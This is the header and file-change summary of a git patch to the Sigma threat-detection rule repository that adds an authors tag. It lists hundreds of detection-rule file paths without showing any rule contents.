From 7c38a5c4966d8088576a324397c1c4ab037df17c Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 1 Feb 2023 11:14:59 +0100 Subject: [PATCH 1/3] chore: add nextron authors tag --- other/godmode_sigma_rule.yml | 2 +- .../windows/file_event_win_hktl_createminidump.yml | 2 +- rules-deprecated/windows/posh_ps_invoke_nightmare.yml | 2 +- rules-deprecated/windows/powershell_suspicious_download.yml | 2 +- .../windows/powershell_suspicious_invocation_generic.yml | 2 +- .../windows/powershell_suspicious_invocation_specific.yml | 2 +- .../windows/proc_creation_win_mavinject_proc_inj.yml | 2 +- ...c_creation_win_powershell_base64_invoke_susp_cmdlets.yml | 2 +- ...oc_creation_win_powershell_base64_listing_shadowcopy.yml | 2 +- .../windows/proc_creation_win_renamed_powershell.yml | 2 +- .../windows/proc_creation_win_renamed_psexec.yml | 2 +- .../windows/proc_creation_win_renamed_rundll32.yml | 2 +- rules-deprecated/windows/registry_set_silentprocessexit.yml | 2 +- rules-deprecated/windows/win_susp_esentutl_activity.yml | 2 +- .../windows/win_susp_vssadmin_ntds_activity.yml | 2 +- .../builtin/security/win_susp_interactive_logons.yml | 2 +- rules-unsupported/win_mal_service_installs.yml | 2 +- rules/category/antivirus/av_exploiting.yml | 2 +- rules/category/antivirus/av_hacktool.yml | 2 +- rules/category/antivirus/av_password_dumper.yml | 2 +- rules/category/antivirus/av_ransomware.yml | 2 +- rules/category/antivirus/av_relevant_files.yml | 2 +- rules/category/antivirus/av_webshell.yml | 2 +- rules/linux/auditd/lnx_auditd_coinminer.yml | 2 +- rules/linux/auditd/lnx_auditd_susp_c2_commands.yml | 6 +++--- rules/linux/auditd/lnx_auditd_susp_cmds.yml | 2 +- rules/linux/auditd/lnx_auditd_susp_exe_folders.yml | 4 ++-- .../auth/lnx_auth_susp_failed_logons_single_source.yml | 2 +- rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml | 2 +- .../builtin/guacamole/lnx_guacamole_susp_guacamole.yml | 2 +- rules/linux/builtin/lnx_apt_equationgroup_lnx.yml | 2 +- rules/linux/builtin/lnx_buffer_overflows.yml | 2 +- rules/linux/builtin/lnx_clear_syslog.yml | 2 +- rules/linux/builtin/lnx_ldso_preload_injection.yml | 2 +- rules/linux/builtin/lnx_shell_susp_commands.yml | 2 +- rules/linux/builtin/lnx_shell_susp_log_entries.yml | 2 +- rules/linux/builtin/lnx_shell_susp_rev_shells.yml | 2 +- rules/linux/builtin/lnx_shellshock.yml | 2 +- rules/linux/builtin/lnx_susp_jexboss.yml | 2 +- rules/linux/builtin/lnx_symlink_etc_passwd.yml | 2 +- rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml | 2 +- rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml | 2 +- rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml | 2 +- rules/linux/builtin/syslog/lnx_syslog_susp_named.yml | 2 +- .../linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml | 2 +- .../file_event/file_event_lnx_persistence_sudoers_files.yml | 2 +- .../file_event_lnx_triple_cross_rootkit_lock_file.yml | 2 +- .../file_event_lnx_triple_cross_rootkit_persistence.yml | 2 +- .../net_connection_lnx_back_connect_shell_dev.yml | 2 +- .../net_connection_lnx_crypto_mining_indicators.yml | 2 +- .../network_connection/net_connection_lnx_ngrok_tunnel.yml | 2 +- .../process_creation/proc_creation_lnx_base64_execution.yml | 2 +- .../proc_creation_lnx_base64_shebang_cli.yml | 2 +- .../proc_creation_lnx_bpf_kprob_tracing_enabled.yml | 2 +- .../process_creation/proc_creation_lnx_capa_discovery.yml | 2 +- .../process_creation/proc_creation_lnx_cat_sudoers.yml | 2 +- .../proc_creation_lnx_chattr_immutable_removal.yml | 2 +- .../process_creation/proc_creation_lnx_clear_syslog.yml | 2 +- .../process_creation/proc_creation_lnx_crontab_removal.yml | 2 +- .../process_creation/proc_creation_lnx_crypto_mining.yml | 2 +- .../linux/process_creation/proc_creation_lnx_curl_usage.yml | 2 +- ...roc_creation_lnx_cve_2022_26134_atlassian_confluence.yml | 2 +- ...ion_lnx_cve_2022_33891_spark_shell_command_injection.yml | 2 +- .../process_creation/proc_creation_lnx_gtfobin_apt.yml | 2 +- .../process_creation/proc_creation_lnx_gtfobin_vim.yml | 2 +- .../linux/process_creation/proc_creation_lnx_hack_tools.yml | 2 +- .../proc_creation_lnx_install_suspicioua_packages.yml | 2 +- .../proc_creation_lnx_services_stop_and_disable.yml | 2 +- .../proc_creation_lnx_sudo_cve_2019_14287.yml | 2 +- .../proc_creation_lnx_susp_curl_fileupload.yml | 2 +- .../proc_creation_lnx_susp_curl_useragent.yml | 2 +- .../proc_creation_lnx_susp_find_execution.yml | 2 +- .../process_creation/proc_creation_lnx_susp_git_clone.yml | 2 +- .../proc_creation_lnx_susp_history_delete.yml | 2 +- .../proc_creation_lnx_susp_history_recon.yml | 2 +- .../proc_creation_lnx_susp_interactive_bash.yml | 2 +- .../proc_creation_lnx_susp_java_children.yml | 2 +- .../process_creation/proc_creation_lnx_susp_pipe_shell.yml | 2 +- .../proc_creation_lnx_susp_recon_indicators.yml | 2 +- ...proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml | 2 +- .../proc_creation_lnx_triple_cross_rootkit_install.yml | 2 +- .../proc_creation_lnx_webshell_detection.yml | 2 +- .../proc_creation_macos_creds_from_keychain.yml | 2 +- .../proc_creation_macos_susp_find_execution.yml | 2 +- .../dns/net_dns_external_service_interaction_domains.yml | 2 +- rules/network/dns/net_dns_mal_cobaltstrike.yml | 2 +- rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml | 2 +- rules/network/dns/net_dns_susp_b64_queries.yml | 2 +- rules/network/dns/net_dns_susp_telegram_api.yml | 2 +- .../network/firewall/net_firewall_apt_equationgroup_c2.yml | 2 +- rules/web/product/apache/web_apache_segfault.yml | 2 +- rules/web/product/apache/web_apache_threading_error.yml | 2 +- rules/web/product/modsecurity/modsec_mulitple_blocks.yml | 2 +- rules/web/proxy_generic/proxy_apt_domestic_kitten.yml | 2 +- rules/web/proxy_generic/proxy_baby_shark.yml | 2 +- rules/web/proxy_generic/proxy_chafer_malware.yml | 2 +- rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml | 2 +- rules/web/proxy_generic/proxy_download_susp_dyndns.yml | 2 +- .../proxy_generic/proxy_download_susp_tlds_blacklist.yml | 2 +- .../proxy_generic/proxy_download_susp_tlds_whitelist.yml | 2 +- rules/web/proxy_generic/proxy_downloadcradle_webdav.yml | 2 +- rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml | 2 +- rules/web/proxy_generic/proxy_empty_ua.yml | 2 +- .../proxy_generic/proxy_exchange_owassrf_exploitation.yml | 2 +- .../proxy_exchange_owassrf_poc_exploitation.yml | 2 +- rules/web/proxy_generic/proxy_ios_implant.yml | 2 +- rules/web/proxy_generic/proxy_powershell_ua.yml | 2 +- rules/web/proxy_generic/proxy_pwndrop.yml | 2 +- rules/web/proxy_generic/proxy_raw_paste_service_access.yml | 2 +- rules/web/proxy_generic/proxy_susp_flash_download_loc.yml | 2 +- rules/web/proxy_generic/proxy_telegram_api.yml | 2 +- rules/web/proxy_generic/proxy_turla_comrat.yml | 2 +- rules/web/proxy_generic/proxy_ua_apt.yml | 2 +- rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml | 2 +- rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml | 2 +- rules/web/proxy_generic/proxy_ua_cryptominer.yml | 2 +- rules/web/proxy_generic/proxy_ua_frameworks.yml | 2 +- rules/web/proxy_generic/proxy_ua_hacktool.yml | 2 +- rules/web/proxy_generic/proxy_ua_malware.yml | 2 +- rules/web/proxy_generic/proxy_ua_susp.yml | 2 +- rules/web/proxy_generic/proxy_ua_susp_base64.yml | 2 +- rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml | 2 +- .../web_cve_2018_2894_weblogic_exploit.yml | 2 +- .../web_cve_2019_11510_pulsesecure_exploit.yml | 2 +- .../web/webserver_generic/web_cve_2019_3398_confluence.yml | 2 +- .../web/webserver_generic/web_cve_2020_0688_msexchange.yml | 2 +- .../web_cve_2020_14882_weblogic_exploit.yml | 2 +- .../webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml | 2 +- rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml | 2 +- .../web_cve_2020_8193_8195_citrix_exploit.yml | 2 +- rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml | 2 +- .../web_cve_2021_28480_exchange_exploit.yml | 2 +- .../web_cve_2021_33766_msexchange_proxytoken.yml | 2 +- .../webserver_generic/web_cve_2021_40539_adselfservice.yml | 2 +- .../web_cve_2021_42237_sitecore_report_ashx.yml | 2 +- rules/web/webserver_generic/web_cve_2021_43798_grafana.yml | 2 +- rules/web/webserver_generic/web_cve_2021_44228_log4j.yml | 2 +- .../webserver_generic/web_cve_2021_44228_log4j_fields.yml | 2 +- .../webserver_generic/web_cve_2022_31656_auth_bypass.yml | 2 +- .../web/webserver_generic/web_cve_2022_31659_vmware_rce.yml | 2 +- .../web_cve_2022_33891_spark_shell_command_injection.yml | 2 +- ...cve_2022_36804_atlassian_bitbucket_command_injection.yml | 2 +- .../web_cve_2022_44877_exploitation_attempt.yml | 2 +- .../web_cve_2022_46169_cacti_exploitation_attempt.yml | 2 +- .../webserver_generic/web_exchange_exploitation_hafnium.yml | 2 +- .../webserver_generic/web_exchange_owassrf_exploitation.yml | 2 +- .../web_exchange_owassrf_poc_exploitation.yml | 2 +- rules/web/webserver_generic/web_exchange_proxyshell.yml | 2 +- .../web_exchange_proxyshell_successful.yml | 2 +- rules/web/webserver_generic/web_jndi_exploit.yml | 2 +- rules/web/webserver_generic/web_nginx_core_dump.yml | 2 +- .../webserver_generic/web_solarwinds_supernova_webshell.yml | 2 +- .../webserver_generic/web_sonicwall_jarrewrite_exploit.yml | 2 +- rules/web/webserver_generic/web_ssti_in_access_logs.yml | 2 +- rules/web/webserver_generic/web_susp_useragents.yml | 2 +- rules/web/webserver_generic/web_susp_windows_path_uri.yml | 2 +- .../webserver_generic/web_unc2546_dewmode_php_webshell.yml | 2 +- .../webserver_generic/web_win_webshells_in_access_logs.yml | 2 +- rules/windows/builtin/application/win_audit_cve.yml | 2 +- rules/windows/builtin/application/win_av_relevant_match.yml | 2 +- .../builtin/application/win_esent_ntdsutil_abuse.yml | 2 +- .../application/win_esent_ntdsutil_abuse_susp_location.yml | 2 +- .../application/win_msi_install_from_susp_locations.yml | 2 +- .../builtin/application/win_mssql_add_sysadmin_account.yml | 2 +- .../application/win_mssql_disable_audit_settings.yml | 2 +- .../builtin/application/win_mssql_sp_procoption_set.yml | 2 +- .../builtin/application/win_mssql_xp_cmdshell_audit_log.yml | 2 +- .../builtin/application/win_mssql_xp_cmdshell_change.yml | 2 +- .../windows/builtin/application/win_susp_backup_delete.yml | 2 +- .../windows/builtin/application/win_susp_msmpeng_crash.yml | 2 +- rules/windows/builtin/application/win_vul_cve_2020_0688.yml | 2 +- .../windows/builtin/application/win_vul_cve_2021_41379.yml | 2 +- .../application/win_werfault_susp_lsass_credential_dump.yml | 2 +- ...n_appmodel_runtime_sysinternals_tools_appx_execution.yml | 2 +- .../win_appxdeployment_server_mal_appx_names.yml | 2 +- ...appxdeployment_server_susp_appx_package_installation.yml | 2 +- .../win_appxdeployment_server_susp_domains.yml | 2 +- .../win_appxdeployment_server_susp_package_locations.yml | 2 +- ...win_appxdeployment_server_uncommon_package_locations.yml | 2 +- .../win_appxpackaging_om_sups_appx_signature.yml | 2 +- .../bits_client/win_bits_client_direct_ip_access.yml | 2 +- .../builtin/bits_client/win_bits_client_susp_domain.yml | 2 +- .../bits_client/win_bits_client_susp_local_folder.yml | 2 +- .../builtin/bits_client/win_bits_client_uncommon_domain.yml | 2 +- .../code_integrity/win_codeintegrity_attempted_dll_load.yml | 2 +- .../win_codeintegrity_blocked_driver_load.yml | 2 +- .../code_integrity/win_codeintegrity_revoked_driver.yml | 2 +- .../scripted/win_diagnosis_scripted_load_remote_diagcab.yml | 2 +- .../builtin/dns_client/win_dns_client__mal_cobaltstrike.yml | 2 +- .../builtin/dns_client/win_dns_client_anonymfiles_com.yml | 2 +- rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml | 2 +- .../windows/builtin/dns_client/win_dns_client_tor_onion.yml | 2 +- .../windows/builtin/dns_client/win_dns_client_ufile_io.yml | 2 +- .../builtin/dns_server/win_dns_server_susp_dns_config.yml | 2 +- .../builtin/driverframeworks/win_usb_device_plugged.yml | 2 +- .../builtin/msexchange/win_exchange_cve_2021_42321.yml | 2 +- .../msexchange/win_exchange_proxylogon_oabvirtualdir.yml | 2 +- .../win_exchange_proxyshell_certificate_generation.yml | 2 +- .../msexchange/win_exchange_proxyshell_mailbox_export.yml | 2 +- .../win_exchange_proxyshell_remove_mailbox_export.yml | 2 +- .../builtin/msexchange/win_exchange_transportagent.yml | 2 +- .../msexchange/win_exchange_transportagent_failed.yml | 2 +- rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml | 2 +- .../printservice/win_exploit_cve_2021_1675_printspooler.yml | 2 +- .../win_exploit_cve_2021_1675_printspooler_operational.yml | 2 +- .../builtin/security/win_security_admin_share_access.yml | 2 +- rules/windows/builtin/security/win_security_alert_ruler.yml | 2 +- .../security/win_security_apt_chafer_mar18_security.yml | 2 +- .../windows/builtin/security/win_security_apt_slingshot.yml | 2 +- rules/windows/builtin/security/win_security_apt_wocao.yml | 2 +- .../security/win_security_cobaltstrike_service_installs.yml | 2 +- rules/windows/builtin/security/win_security_dcsync.yml | 2 +- .../win_security_diagtrack_eop_default_login_username.yml | 2 +- .../builtin/security/win_security_hidden_user_creation.yml | 2 +- .../builtin/security/win_security_mal_creddumper.yml | 2 +- .../builtin/security/win_security_mal_service_installs.yml | 2 +- .../builtin/security/win_security_net_ntlm_downgrade.yml | 2 +- .../security/win_security_rare_schtasks_creations.yml | 2 +- .../security/win_security_rdp_bluekeep_poc_scanner.yml | 2 +- .../win_security_samaccountname_spoofing_cve_2021_42287.yml | 2 +- .../builtin/security/win_security_susp_eventlog_cleared.yml | 2 +- .../security/win_security_susp_failed_logon_reasons.yml | 2 +- .../win_security_susp_failed_logons_single_source.yml | 2 +- .../win_security_susp_failed_logons_single_source2.yml | 2 +- .../security/win_security_susp_kerberos_manipulation.yml | 2 +- .../security/win_security_susp_logon_newcredentials.yml | 2 +- .../security/win_security_susp_net_recon_activity.yml | 2 +- .../security/win_security_susp_opened_encrypted_zip.yml | 2 +- .../win_security_susp_opened_encrypted_zip_filename.yml | 2 +- .../win_security_susp_opened_encrypted_zip_outlook.yml | 2 +- .../win_security_susp_possible_shadow_credentials_added.yml | 2 +- .../builtin/security/win_security_susp_rc4_kerberos.yml | 2 +- .../security/win_security_susp_scheduled_task_creation.yml | 2 +- .../security/win_security_susp_scheduled_task_delete.yml | 2 +- .../security/win_security_susp_scheduled_task_update.yml | 2 +- .../win_security_user_added_to_local_administrators.yml | 2 +- .../builtin/security/win_security_wmi_persistence.yml | 2 +- ...security_mitigations_unsigned_dll_from_susp_location.yml | 2 +- .../shell_core/win_shell_core_susp_packages_installed.yml | 2 +- .../builtin/smbclient/win_susp_failed_guest_logon.yml | 2 +- .../builtin/system/win_system_apt_carbonpaper_turla.yml | 2 +- .../builtin/system/win_system_apt_chafer_mar18_system.yml | 2 +- rules/windows/builtin/system/win_system_apt_stonedrill.yml | 2 +- .../builtin/system/win_system_apt_turla_service_png.yml | 2 +- .../system/win_system_cobaltstrike_service_installs.yml | 2 +- .../windows/builtin/system/win_system_eventlog_cleared.yml | 2 +- .../builtin/system/win_system_kdcsvc_rc4_downgrade.yml | 2 +- .../builtin/system/win_system_lpe_indicators_tabtip.yml | 2 +- rules/windows/builtin/system/win_system_mal_creddumper.yml | 2 +- .../windows/builtin/system/win_system_ntfs_vuln_exploit.yml | 2 +- ...win_system_quarkspwdump_clearing_hive_access_history.yml | 2 +- .../builtin/system/win_system_rare_service_installs.yml | 2 +- .../builtin/system/win_system_service_install_anydesk.yml | 2 +- .../builtin/system/win_system_service_install_hacktools.yml | 2 +- .../system/win_system_service_install_mesh_agent.yml | 2 +- .../win_system_service_install_netsupport_manager.yml | 2 +- .../builtin/system/win_system_service_install_paexec.yml | 2 +- .../builtin/system/win_system_service_install_pdqdeploy.yml | 2 +- .../system/win_system_service_install_pdqdeploy_runner.yml | 2 +- .../system/win_system_service_install_remote_utilities.yml | 2 +- .../builtin/system/win_system_service_install_sliver.yml | 2 +- .../win_system_service_install_susp_double_ampersand.yml | 2 +- .../system/win_system_service_install_tacticalrmm.yml | 2 +- .../builtin/system/win_system_susp_eventlog_cleared.yml | 2 +- .../windows/builtin/system/win_system_susp_proceshacker.yml | 2 +- .../system/win_system_susp_rtcore64_service_install.yml | 2 +- rules/windows/builtin/system/win_system_susp_sam_dump.yml | 2 +- .../builtin/system/win_system_susp_service_installation.yml | 2 +- .../system/win_system_susp_service_installation_folder.yml | 2 +- .../win_system_susp_service_installation_folder_pattern.yml | 2 +- .../system/win_system_susp_service_installation_script.yml | 2 +- .../win_taskscheduler_rare_schtask_creation.yml | 2 +- .../taskscheduler/win_taskscheduler_susp_task_locations.yml | 2 +- .../terminalservices/win_terminalservices_rdp_ngrok.yml | 2 +- rules/windows/builtin/win_alert_mimikatz_keywords.yml | 2 +- rules/windows/builtin/windefend/win_defender_exclusions.yml | 2 +- .../builtin/windefend/win_defender_exploit_guard_tamper.yml | 2 +- .../windefend/win_defender_restored_quarantine_file.yml | 2 +- .../win_defender_suspicious_features_tampering.yml | 2 +- rules/windows/builtin/wmi/win_wmi_persistence.yml | 2 +- .../create_remote_thread_win_bumblebee.yml | 2 +- ...ate_remote_thread_win_cobaltstrike_process_injection.yml | 2 +- .../create_remote_thread_win_susp_powershell_rundll32.yml | 2 +- .../create_remote_thread_win_susp_remote_thread_target.yml | 2 +- .../create_remote_thread_win_susp_targets.yml | 2 +- .../create_stream_hash_ads_executable.yml | 2 +- .../create_stream_hash_hacktool_download.yml | 2 +- .../create_stream_hash_susp_domain_ext_combo.yml | 2 +- .../create_stream_hash_susp_domain_ext_combo_med.yml | 2 +- .../create_stream_hash_susp_ip_domains.yml | 2 +- rules/windows/dns_query/dns_query_win_anonymfiles_com.yml | 2 +- rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml | 2 +- rules/windows/dns_query/dns_query_win_susp_teamviewer.yml | 2 +- .../windows/driver_load/driver_load_win_mal_creddumper.yml | 2 +- .../driver_load/driver_load_win_mal_poortry_driver.yml | 2 +- .../windows/driver_load/driver_load_win_process_hacker.yml | 2 +- rules/windows/driver_load/driver_load_win_susp_temp_use.yml | 2 +- .../driver_load_win_vuln_avast_anti_rootkit_driver.yml | 2 +- .../driver_load/driver_load_win_vuln_dell_driver.yml | 2 +- rules/windows/driver_load/driver_load_win_vuln_drivers.yml | 2 +- .../driver_load/driver_load_win_vuln_drivers_names.yml | 2 +- .../driver_load/driver_load_win_vuln_gigabyte_driver.yml | 2 +- .../driver_load/driver_load_win_vuln_hevd_driver.yml | 2 +- .../windows/driver_load/driver_load_win_vuln_hw_driver.yml | 2 +- .../driver_load/driver_load_win_vuln_lenovo_driver.yml | 2 +- .../driver_load/driver_load_win_vuln_winring0_driver.yml | 2 +- rules/windows/driver_load/driver_load_win_windivert.yml | 2 +- .../file_access_win_credential_manager_stealing.yml | 2 +- .../file_access/file_access_win_dpapi_master_key_access.yml | 2 +- .../file_access/file_access_win_susp_cred_hist_access.yml | 2 +- .../file_delete_win_exchange_powershell_logs.yml | 2 +- .../file_event_win_anydesk_writing_susp_binaries.yml | 2 +- .../file_event/file_event_win_crackmapexec_patterns.yml | 2 +- .../file_event/file_event_win_create_non_existent_dlls.yml | 2 +- .../file_event_win_cve_2021_1675_printspooler.yml | 2 +- .../file_event/file_event_win_cve_2021_41379_msi_lpe.yml | 2 +- .../file_event_win_cve_2021_44077_poc_default_files.yml | 2 +- .../file/file_event/file_event_win_cve_2022_24527_lpe.yml | 2 +- .../file_event_win_error_handler_cmd_persistence.yml | 2 +- .../file_event/file_event_win_exchange_webshell_drop.yml | 2 +- .../file_event_win_exchange_webshell_drop_suspicious.yml | 2 +- .../windows/file/file_event/file_event_win_hack_dumpert.yml | 2 +- .../file_event_win_hivenightmare_file_exports.yml | 2 +- .../windows/file/file_event/file_event_win_hktl_nppspy.yml | 2 +- .../file/file_event/file_event_win_inveigh_artefacts.yml | 2 +- .../file/file_event/file_event_win_iso_file_recent.yml | 2 +- rules/windows/file/file_event/file_event_win_lsass_dump.yml | 2 +- .../file/file_event/file_event_win_lsass_werfault_dump.yml | 2 +- rules/windows/file/file_event/file_event_win_mal_adwind.yml | 2 +- .../file_event_win_mimikatz_kirbi_file_creation.yml | 2 +- .../file_event_win_new_files_in_uncommon_appdata_folder.yml | 2 +- .../file_event_win_notepad_plus_plus_persistence.yml | 2 +- rules/windows/file/file_event/file_event_win_ntds_dit.yml | 2 +- .../file/file_event/file_event_win_ntds_exfil_tools.yml | 2 +- ...file_event_win_one_extension_files_in_susp_locations.yml | 2 +- .../file/file_event/file_event_win_outlook_newform.yml | 2 +- .../file_event_win_powershell_exploit_scripts.yml | 2 +- .../file/file_event/file_event_win_psexec_service_key.yml | 2 +- .../file/file_event/file_event_win_quarkspw_filedump.yml | 2 +- rules/windows/file/file_event/file_event_win_sam_dump.yml | 2 +- .../file_event_win_shell_write_susp_directory.yml | 2 +- .../file_event_win_shell_write_susp_files_extensions.yml | 2 +- .../file_event_win_susp_desktopimgdownldr_file.yml | 2 +- .../file_event/file_event_win_susp_double_extension.yml | 2 +- .../file_event/file_event_win_susp_exchange_aspx_write.yml | 2 +- .../file_event/file_event_win_susp_lnk_double_extension.yml | 2 +- .../file/file_event/file_event_win_susp_ntds_dit.yml | 2 +- .../file_event_win_susp_spool_drivers_color_drop.yml | 2 +- .../file_event_win_susp_startup_folder_persistence.yml | 2 +- .../file_event_win_susp_system_interactive_powershell.yml | 2 +- .../file/file_event/file_event_win_susp_task_write.yml | 2 +- .../file_event_win_susp_teamviewer_remote_session.yml | 2 +- .../file_event_win_susp_vscode_powershell_profile.yml | 2 +- ...event_win_system32_local_folder_privilege_escalation.yml | 2 +- .../file_event_win_uac_bypass_consent_comctl32.yml | 2 +- .../file_event_win_uac_bypass_dotnet_profiler.yml | 2 +- .../file/file_event/file_event_win_uac_bypass_eventvwr.yml | 2 +- .../file_event_win_uac_bypass_idiagnostic_profile.yml | 2 +- .../file/file_event/file_event_win_uac_bypass_ieinstal.yml | 2 +- .../file_event/file_event_win_uac_bypass_msconfig_gui.yml | 2 +- .../file_event_win_uac_bypass_ntfs_reparse_point.yml | 2 +- .../file/file_event/file_event_win_uac_bypass_winsat.yml | 2 +- .../file/file_event/file_event_win_uac_bypass_wmp.yml | 2 +- .../file_event/file_event_win_winword_cve_2021_40444.yml | 2 +- .../file_event/file_event_win_wmiexec_default_filename.yml | 2 +- .../file_event/file_event_win_word_template_creation.yml | 2 +- .../file/file_event/file_event_win_wpbbin_persistence.yml | 2 +- rules/windows/image_load/image_load_foggyweb_nobelium.yml | 2 +- .../image_load_rundll32_loading_renamed_comsvcs.yml | 2 +- rules/windows/image_load/image_load_side_load_antivirus.yml | 2 +- ...oad_side_load_aruba_networks_virtual_intranet_access.yml | 2 +- rules/windows/image_load/image_load_side_load_comctl32.yml | 2 +- .../windows/image_load/image_load_side_load_dbgcore_dll.yml | 2 +- .../windows/image_load/image_load_side_load_dbghelp_dll.yml | 2 +- .../image_load_side_load_from_non_system_location.yml | 2 +- .../image_load/image_load_side_load_non_existent_dlls.yml | 2 +- .../windows/image_load/image_load_side_load_office_dlls.yml | 2 +- rules/windows/image_load/image_load_side_load_scm.yml | 2 +- .../windows/image_load/image_load_side_load_third_party.yml | 2 +- .../windows/image_load/image_load_side_load_vmguestlib.yml | 2 +- .../image_load/image_load_side_load_web_browsers.yml | 2 +- rules/windows/image_load/image_load_susp_cmstp.yml | 2 +- .../image_load/image_load_susp_dll_load_system_process.yml | 2 +- .../image_load/image_load_sysmon_disable_sharpevtmute.yml | 2 +- rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml | 2 +- rules/windows/image_load/image_load_usp_svchost_clfsw32.yml | 2 +- ...image_load_vmware_xfer_load_dll_from_nondefault_path.yml | 2 +- .../net_connection_win_binary_github_com.yml | 2 +- .../net_connection_win_binary_susp_com.yml | 2 +- .../network_connection/net_connection_win_crypto_mining.yml | 2 +- .../network_connection/net_connection_win_eqnedt.yml | 2 +- rules/windows/network_connection/net_connection_win_hh.yml | 2 +- .../net_connection_win_malware_backconnect_ports.yml | 2 +- .../network_connection/net_connection_win_mega_nz.yml | 2 +- .../network_connection/net_connection_win_ngrok_io.yml | 2 +- .../network_connection/net_connection_win_ngrok_tunnel.yml | 2 +- .../net_connection_win_powershell_network_connection.yml | 2 +- .../network_connection/net_connection_win_rdp_to_http.yml | 2 +- .../net_connection_win_rundll32_net_connections.yml | 2 +- .../net_connection_win_susp_binary_no_cmdline.yml | 2 +- .../network_connection/net_connection_win_susp_cmstp.yml | 2 +- .../net_connection_win_susp_dropbox_api.yml | 2 +- ...connection_win_susp_prog_location_network_connection.yml | 2 +- .../pipe_created_diagtrack_eop_default_pipe.yml | 2 +- .../pipe_created/pipe_created_efspotato_namedpipe.yml | 2 +- .../windows/pipe_created/pipe_created_koh_default_pipe.yml | 2 +- .../windows/pipe_created/pipe_created_mal_cobaltstrike.yml | 2 +- .../pipe_created/pipe_created_mal_cobaltstrike_re.yml | 2 +- rules/windows/pipe_created/pipe_created_mal_namedpipes.yml | 2 +- .../pipe_created/pipe_created_paexec_default_pipe.yml | 2 +- .../pipe_created_psexec_default_pipe_from_susp_location.yml | 2 +- .../pipe_created_susp_cobaltstrike_pipe_patterns.yml | 2 +- .../pipe_created_susp_wmi_consumer_namedpipe.yml | 2 +- .../powershell_classic/posh_pc_downgrade_attack.yml | 2 +- .../powershell_classic/posh_pc_exe_calling_ps.yml | 2 +- .../powershell/powershell_classic/posh_pc_susp_download.yml | 2 +- .../posh_pm_active_directory_module_dll_import.yml | 2 +- .../powershell_module/posh_pm_get_addbaccount.yml | 2 +- .../powershell_module/posh_pm_malicious_commandlets.yml | 2 +- .../powershell/powershell_module/posh_pm_susp_download.yml | 2 +- .../powershell_module/posh_pm_susp_invocation_generic.yml | 2 +- .../powershell_module/posh_pm_susp_invocation_specific.yml | 2 +- .../posh_ps_aadinternals_cmdlets_execution.yml | 2 +- .../powershell_script/posh_ps_add_windows_capability.yml | 2 +- .../powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml | 2 +- .../powershell_script/posh_ps_amsi_null_bits_bypass.yml | 2 +- .../powershell_script/posh_ps_audio_exfiltration.yml | 2 +- .../posh_ps_computer_discovery_get_adcomputer.yml | 2 +- .../powershell_script/posh_ps_etw_trace_evasion.yml | 2 +- .../posh_ps_exchange_mailbox_smpt_forwarding_rule.yml | 2 +- .../powershell/powershell_script/posh_ps_hotfix_enum.yml | 2 +- .../powershell_script/posh_ps_import_module_susp_dirs.yml | 2 +- .../powershell_script/posh_ps_mailboxexport_share.yml | 2 +- .../powershell_script/posh_ps_malicious_commandlets.yml | 2 +- .../powershell_script/posh_ps_malicious_keywords.yml | 2 +- .../posh_ps_memorydump_getstoragediagnosticinfo.yml | 2 +- .../powershell_script/posh_ps_prompt_credentials.yml | 2 +- .../powershell/powershell_script/posh_ps_psasyncshell.yml | 2 +- .../powershell/powershell_script/posh_ps_psattack.yml | 2 +- .../powershell/powershell_script/posh_ps_shellcode_b64.yml | 2 +- .../posh_ps_shellintel_malicious_commandlets.yml | 2 +- .../powershell_script/posh_ps_susp_ace_tampering.yml | 2 +- .../powershell_script/posh_ps_susp_alias_obfscuation.yml | 2 +- .../powershell_script/posh_ps_susp_clear_eventlog.yml | 2 +- .../powershell/powershell_script/posh_ps_susp_download.yml | 2 +- .../posh_ps_susp_export_pfxcertificate.yml | 2 +- .../powershell_script/posh_ps_susp_follina_execution.yml | 2 +- .../powershell_script/posh_ps_susp_getprocess_lsass.yml | 2 +- .../powershell_script/posh_ps_susp_invocation_generic.yml | 2 +- .../powershell_script/posh_ps_susp_invocation_specific.yml | 2 +- .../powershell_script/posh_ps_susp_keylogger_activity.yml | 2 +- .../powershell/powershell_script/posh_ps_susp_keywords.yml | 2 +- .../powershell_script/posh_ps_susp_proxy_scripts.yml | 2 +- .../posh_ps_susp_service_dacl_modification_set_service.yml | 2 +- .../powershell_script/posh_ps_susp_write_eventlog.yml | 2 +- .../posh_ps_tamper_defender_remove_mppreference.yml | 2 +- .../powershell_script/posh_ps_user_discovery_get_aduser.yml | 2 +- .../posh_ps_using_set_service_to_hide_services.yml | 2 +- .../posh_ps_wmi_unquoted_service_search.yml | 2 +- .../proc_access_win_cobaltstrike_bof_injection_pattern.yml | 2 +- .../proc_access_win_cred_dump_lsass_access.yml | 2 +- .../proc_access_win_direct_syscall_ntopenprocess.yml | 2 +- .../process_access/proc_access_win_hack_sysmonente.yml | 2 +- .../proc_access_win_littlecorporal_generated_maldoc.yml | 2 +- .../proc_access_win_lsass_memdump_evasion.yml | 2 +- .../proc_access_win_lsass_memdump_indicators.yml | 2 +- .../process_access/proc_access_win_lsass_werfault.yml | 2 +- .../proc_access_win_malware_verclsid_shellcode.yml | 2 +- .../proc_access_win_rare_proc_access_lsass.yml | 2 +- .../proc_access_win_susp_proc_access_lsass.yml | 2 +- .../proc_access_win_susp_proc_access_lsass_susp_source.yml | 2 +- 